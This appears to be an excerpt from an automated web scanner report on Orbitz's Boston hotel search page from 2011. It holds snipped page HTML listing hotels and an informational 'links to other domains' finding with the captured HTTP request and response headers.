ch&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot&hsv.showDetails=true&hotel.hid=29958&hotel.hkey=29958_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/958/29958/Boston-Marriott-Copley-Place-Hotel-Exterior-29.jpg&#034;
                       }
   }" /> </a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot&hsv.showDetails=true&hotel.hid=287572&hotel.hkey=287572_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/572/287572/Four-Seasons-Boston-Hotel-Exterior-9.jpg&#034;
                       }
   }" /> </a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star5/medium/star5-1.png" alt="5 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
ch&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot&hsv.showDetails=true&hotel.hid=29957&hotel.hkey=29957_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/957/29957/Boston-Marriott-Cambridge-Hotel-Exterior-1.jpg&#034;
                       }
   }" /> </a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
ch&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot&hsv.showDetails=true&hotel.hid=29959&hotel.hkey=29959_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/959/29959/Boston-Marriott-Long-Wharf-Hotel-Exterior-1.jpg&#034;
                       }
   }" /> </a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
ch&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot&hsv.showDetails=true&hotel.hid=44414&hotel.hkey=44414_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/414/44414/BostonNatick-Travelodge-Hotel-Exterior-1.jpg&#034;
                       }
   }" /> </a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star2/medium/star2-1.png" alt="2 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
ch&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot&hsv.showDetails=true&hotel.hid=80231&hotel.hkey=80231_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/231/80231/La-Quinta-Inn-Suites-Boston-Somerville-Hotel-Exterior-1.jpg&#034;
                       }
   }" /> </a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot&hsv.showDetails=true&hotel.hid=283875&hotel.hkey=283875_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/875/283875/The-Inn-at-St-Botolph-Hotel-Exterior-3-20110809-195310-235.jpg&#034;
                       }
   }" /> </a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
ch&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot&hsv.showDetails=true&hotel.hid=58796&hotel.hkey=58796_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/796/58796/Hyatt-Regency-Boston-Hotel-Exterior-6.jpg&#034;
                       }
   }" /> </a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
ch&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot&hsv.showDetails=true&hotel.hid=27748&hotel.hkey=27748_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/748/27748/Hyatt-Regency-Cambridge-Hotel-Exterior-14.jpg&#034;
                       }
   }" /> </a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
ch&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot&hsv.showDetails=true&hotel.hid=24646&hotel.hkey=24646_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/646/24646/Royal-Sonesta-Hotel-Boston-Hotel-Exterior-1.jpg&#034;
                       }
   }" /> </a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot&hsv.showDetails=true&hotel.hid=248217&hotel.hkey=248217_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/662/74662/12928571/PROP0-20101014-121159-265.jpg&#034;
                       }
   }" /> </a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star2/medium/star2-1.png" alt="2 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
ch&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot&hsv.showDetails=true&hotel.hid=83678&hotel.hkey=83678_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/678/83678/Courtyard-by-Marriott-Boston-South-Boston-Hotel-Exterior-1.jpg&#034;
                       }
   }" /> </a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
ch&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot&hsv.showDetails=true&hotel.hid=27609&hotel.hkey=27609_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/609/27609/BEST-WESTERN-PLUS-at-Historic-Concord-Hotel-Exterior-1.jpg&#034;
                       }
   }" /> </a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
ch&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot&hsv.showDetails=true&hotel.hid=21445&hotel.hkey=21445_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/445/21445/Holiday-Inn-Hotel-Suites-BOSTON-PEABODY-Hotel-Exterior-41-20110820-190324-704.jpg&#034;
                       }
   }" /> </a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
arch&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot&hsv.showDetails=true&hotel.hid=5022&hotel.hkey=5022_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/022/5022/ESA-Boston-Danvers-Hotel-Exterior-1-20110805-223133-004.jpg&#034;
                       }
   }" /> </a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star2/medium/star2-1.png" alt="2 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
arch&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot&hsv.showDetails=true&hotel.hid=5408&hotel.hkey=5408_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/408/5408/Radisson-Hotel-Boston-Hotel-Exterior-1.jpg&#034;
                       }
   }" /> </a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
ch&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot&hsv.showDetails=true&hotel.hid=69512&hotel.hkey=69512_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/512/69512/Courtyard-by-Marriott-Boston-Copley-Square-Hotel-Exterior-1.jpg&#034;
                       }
   }" /> </a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot&hsv.showDetails=true&hotel.hid=267914&hotel.hkey=267914_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/381/8381/802796061/PROP0-20110713-120638-319.jpg&#034;
                       }
   }" /> </a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star2/medium/star2-1.png" alt="2 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot&hsv.showDetails=true&hotel.hid=292301&hotel.hkey=292301_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/741/12304741/815075911/PROP0-20110727-104657-007.jpg&#034;
                       }
   }" /> </a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
ch&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot&hsv.showDetails=true&hotel.hid=12248&hotel.hkey=12248_null_null_null_A1:0" class="thumbnail link"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/product/hotel/placeholder/hotelThumb-1.png" alt="" height="90" width="120" class="thumb" data-agent="{
       &#034;type&#034;:&#034;DeferredImage&#034;
        ,&#034;params&#034;:{
                           &#034;src&#034;:&#034;http://www.tnetnoc.com/hotelimages/248/12248/Hilton-Boston-Logan-Airport-Hotel-Exterior-1.jpg&#034;
                       }
   }" /> </a>
...[SNIP]...
<div class="hotelRatings">
    <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" class="stars" />
    <div class="hotelUserRatingsSummary design1">
...[SNIP]...
<div class="ad sponsoredHotelResultsCard bottom1" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&amp;pos=bottom1&amp;Section=results&amp;channel=hotel&amp;tile=1317600604712&amp;refUrl=http%3A%2F%2Fwww.orbitz.com%2F&amp;spu=true&amp;location=US&amp;secure=false&amp;state=MA&amp;searchType=hotel&amp;CookieName=PRO2&amp;currency=USD&amp;aboveThreshold=true&amp;city=BOSTON&amp;passengers=a&amp;preTeen=0&amp;search=Search&amp;mkid=11231&amp;hotelSearchType=keyword&amp;infants=0&amp;site=orbitz&amp;platform=austin&amp;gradeSchoolers=0&amp;numberOfAdultsRoom0=1&amp;hotelCheckOutDate=10%2F7%2F11&amp;productPath=HOTEL&amp;numberOfRooms=1&amp;hotelCheckInDate=10%2F4%2F11&amp;preSchoolers=0&amp;m=0&amp;toddlers=0&amp;country=US&amp;v=50.23.123.106-1472814720.30179680&amp;dest=BOSTON&amp;numberOfChildren=0&amp;teenagers=0&amp;subdomain=orbitz&amp;language=en_US"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard bottom2" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&amp;pos=bottom2&amp;Section=results&amp;channel=hotel&amp;tile=1317600604712&amp;refUrl=http%3A%2F%2Fwww.orbitz.com%2F&amp;spu=true&amp;location=US&amp;secure=false&amp;state=MA&amp;searchType=hotel&amp;CookieName=PRO2&amp;currency=USD&amp;aboveThreshold=true&amp;city=BOSTON&amp;passengers=a&amp;preTeen=0&amp;search=Search&amp;mkid=11231&amp;hotelSearchType=keyword&amp;infants=0&amp;site=orbitz&amp;platform=austin&amp;gradeSchoolers=0&amp;numberOfAdultsRoom0=1&amp;hotelCheckOutDate=10%2F7%2F11&amp;productPath=HOTEL&amp;numberOfRooms=1&amp;hotelCheckInDate=10%2F4%2F11&amp;preSchoolers=0&amp;m=0&amp;toddlers=0&amp;country=US&amp;v=50.23.123.106-1472814720.30179680&amp;dest=BOSTON&amp;numberOfChildren=0&amp;teenagers=0&amp;subdomain=orbitz&amp;language=en_US"></script>
...[SNIP]...
<li><a rel="nofollow" href="http://www.orbitzgames.com">Orbitz Games</a>
...[SNIP]...
<li><a href="http://www.orbitz-ir.com" rel="nofollow">Investors</a>
...[SNIP]...
<li><a href="http://www.orbitzforagents.com/">Orbitz for Agents</a>
...[SNIP]...
<li class="icon facebook">
                   <a href="http://www.facebook.com/Orbitz" rel="nofollow" target="_blank">Facebook</a>
...[SNIP]...
<li class="icon twitter last">
                   <a href="http://twitter.com/orbitz" rel="nofollow" target="_blank">Twitter</a>
...[SNIP]...
</ul>

               
            <img src="http://www.tnetnoc.com/siteImages/ORB/brandImages/footerLogo/logo-1.png" alt="Orbitz" height="15" width="100" class="logo" />
    <div class="agencyInformation">
...[SNIP]...
<!-- [/standard Advert: 120x55_footer]    -->
<a href="https://seal.verisign.com/splash?form_file=fdf%2Fsplash.fdf&amp;dn=www.orbitz.com&amp;lang=en" class="link" target="_blank"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/logos/partner/security/verisign-1.gif" alt="logo" height="35" width="66" />
    </a> <a href="http://www.truste.org/ivalidate.php?url=www.orbitz.com&amp;sealid=101" class="link" target="_blank" rel="nofollow"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/logos/partner/security/truste-1.gif" alt="TRUSTe" height="35" width="128" />
    </a>
...[SNIP]...
<noscript>
            <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&amp;WT.js=No" />                
           </noscript>
...[SNIP]...
19.239. http://www.orbitz.com/shop/hotelsearch  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /shop/hotelsearch

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /shop/hotelsearch?type=hotel&hotel.keyword.key=Boston%2CUnited%20States&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/04/11&hotel.chkout=10/07/11&search=Search&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot&hsv.showDetails=true&hotel.hid=10417&hotel.hkey=10417_null_null_null_A1:0 HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.orbitz.com/shop/hotelsearch?type=hotel&hotel.keyword.key=Boston%2CUnited%20States&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/04/11&hotel.chkout=10/07/11&search=Search&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OSC=71A4AF1632EAB3B1F4E0C49149EEC65B; anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; adRotator=true; JSESSIONID=DFE4F06BE571072B; logging=71A4AF1632EAB3B1F4E0C49149EEC65B|egapp27p|egapp2189p.prod.orbitz.net; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDA1NTEzNDh8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOTowOToxMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b25545525d5f4f58455e445a4a4217b9; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; mbox=session#1317600406536-142286#1317602423|check#true#1317600623|PC#1317600406536-142286.19#1320192592; curr=USD; _br_uid_1=uid%3D999836241826%3A; _br_uid_2=uid%3D999836241826%3A%3A; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598015900:ss=1317596806325; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: curr=USD; Expires=Sat, 21-Oct-2079 03:41:11 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Pragma: no-cache
Cache-Control: no-store
Set-Cookie: MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDE2MjQ4MjZ8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToyNzowNCBQTXwgfCA="; Version=1; Domain=orbitz.com; Max-Age=2592000; Expires=Wed, 02-Nov-2011 00:27:04 GMT; Path=/
Set-Cookie: dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; Expires=Fri, 02-Dec-2011 00:27:04 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 03 Oct 2011 00:27:05 GMT
Content-Length: 184674


...[SNIP]...
<link rel="canonical" href="http://www.orbitz.com/hotel/United_States--MA/Boston/The_Boston_Park_Plaza_Hotel_&_Towers.h10417/"/>
<link rel="stylesheet" type="text/css" href="http://www.tnetnoc.com/static/28.12.12/POS/ORB/cssAll1.css" media="all"/>
               <link rel="stylesheet" type="text/css" href="http://www.tnetnoc.com/static/28.12.12/POS/ORB/cssAll2.css" media="all"/>
               <link rel="stylesheet" type="text/css" href="http://www.tnetnoc.com/static/28.12.12/style/global/printAll.css" media="print">
               <!--[if IE 6]>
...[SNIP]...
<!-- BEGIN LivePerson Monitor. -->
       <script type="text/javascript" src="http://www.tnetnoc.com/static/28.12.12/script/jsAllTealeaf.js"></script>
...[SNIP]...
<a href="http://www.orbitz.com/" class="link"> <img src="http://www.tnetnoc.com/siteImages/ORB/brandImages/headerLogo/logo-2.png" alt="Orbitz" height="28" width="153" class="logo" />
    </a>
...[SNIP]...
</h1>
            <img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="stars" />
    </div>
...[SNIP]...
<div class="photo">
                <img src="http://www.tnetnoc.com/hotelimages/417/10417/The-Boston-Park-Plaza-Hotel-Towers-Hotel-Exterior-1.jpg" alt="" />
</div>
...[SNIP]...
amp;pageView=virtualTour" class="virtualTourLink link" data-agent="{
       &#034;type&#034;:&#034;PopupWindow.VirtualTour&#034;
       
   }" target="_blank" rel="nofollow"> <img src="http://www.tnetnoc.com/siteImages/GLOBAL/icons/photoviewer/virtualTour/photoviewer_virtualtour-1.png" alt="Virtual Tour" height="36" width="36" title="Virtual tour" />
    </a>
...[SNIP]...
<li>
                           <a href="http://www.tnetnoc.com/hotelimages/417/10417/The-Boston-Park-Plaza-Hotel-Towers-Hotel-Exterior-1.jpg" class="link" target="_blank" rel="nofollow"> <img src="http://www.tnetnoc.com/hotelimages/417/10417/The-Boston-Park-Plaza-Hotel-Towers-Hotel-Exterior-1.jpg" alt="The-Boston-Park-Plaza-Hotel-&-Towers-Hotel-Exterior" />
</a>
...[SNIP]...
<li>
                           <a href="http://www.tnetnoc.com/hotelimages/417/10417/The-Boston-Park-Plaza-Hotel-Towers-Hotel-Exterior-4.jpg" class="link" target="_blank" rel="nofollow"> <img src="http://www.tnetnoc.com/hotelimages/417/10417/The-Boston-Park-Plaza-Hotel-Towers-Hotel-Exterior-4.jpg" alt="The-Boston-Park-Plaza-Hotel-&-Towers-Hotel-Exterior" />
</a>
...[SNIP]...
<li>
                           <a href="http://www.tnetnoc.com/hotelimages/417/10417/The-Boston-Park-Plaza-Hotel-Towers-Hotel-Exterior-5.jpg" class="link" target="_blank" rel="nofollow"> <img src="http://www.tnetnoc.com/hotelimages/417/10417/The-Boston-Park-Plaza-Hotel-Towers-Hotel-Exterior-5.jpg" alt="The-Boston-Park-Plaza-Hotel-&-Towers-Hotel-Exterior" />
</a>
...[SNIP]...
<li>
                           <a href="http://www.tnetnoc.com/hotelimages/417/10417/The-Boston-Park-Plaza-Hotel-Towers-Hotel-Exterior-6.jpg" class="link" target="_blank" rel="nofollow"> <img src="http://www.tnetnoc.com/hotelimages/417/10417/The-Boston-Park-Plaza-Hotel-Towers-Hotel-Exterior-6.jpg" alt="The-Boston-Park-Plaza-Hotel-&-Towers-Hotel-Exterior" />
</a>
...[SNIP]...
<li>
                           <a href="http://www.tnetnoc.com/hotelimages/417/10417/The-Boston-Park-Plaza-Hotel-Towers-Lobby-3.jpg" class="link" target="_blank" rel="nofollow"> <img src="http://www.tnetnoc.com/hotelimages/417/10417/The-Boston-Park-Plaza-Hotel-Towers-Lobby-3.jpg" alt="The-Boston-Park-Plaza-Hotel-&-Towers-Lobby" />
</a>
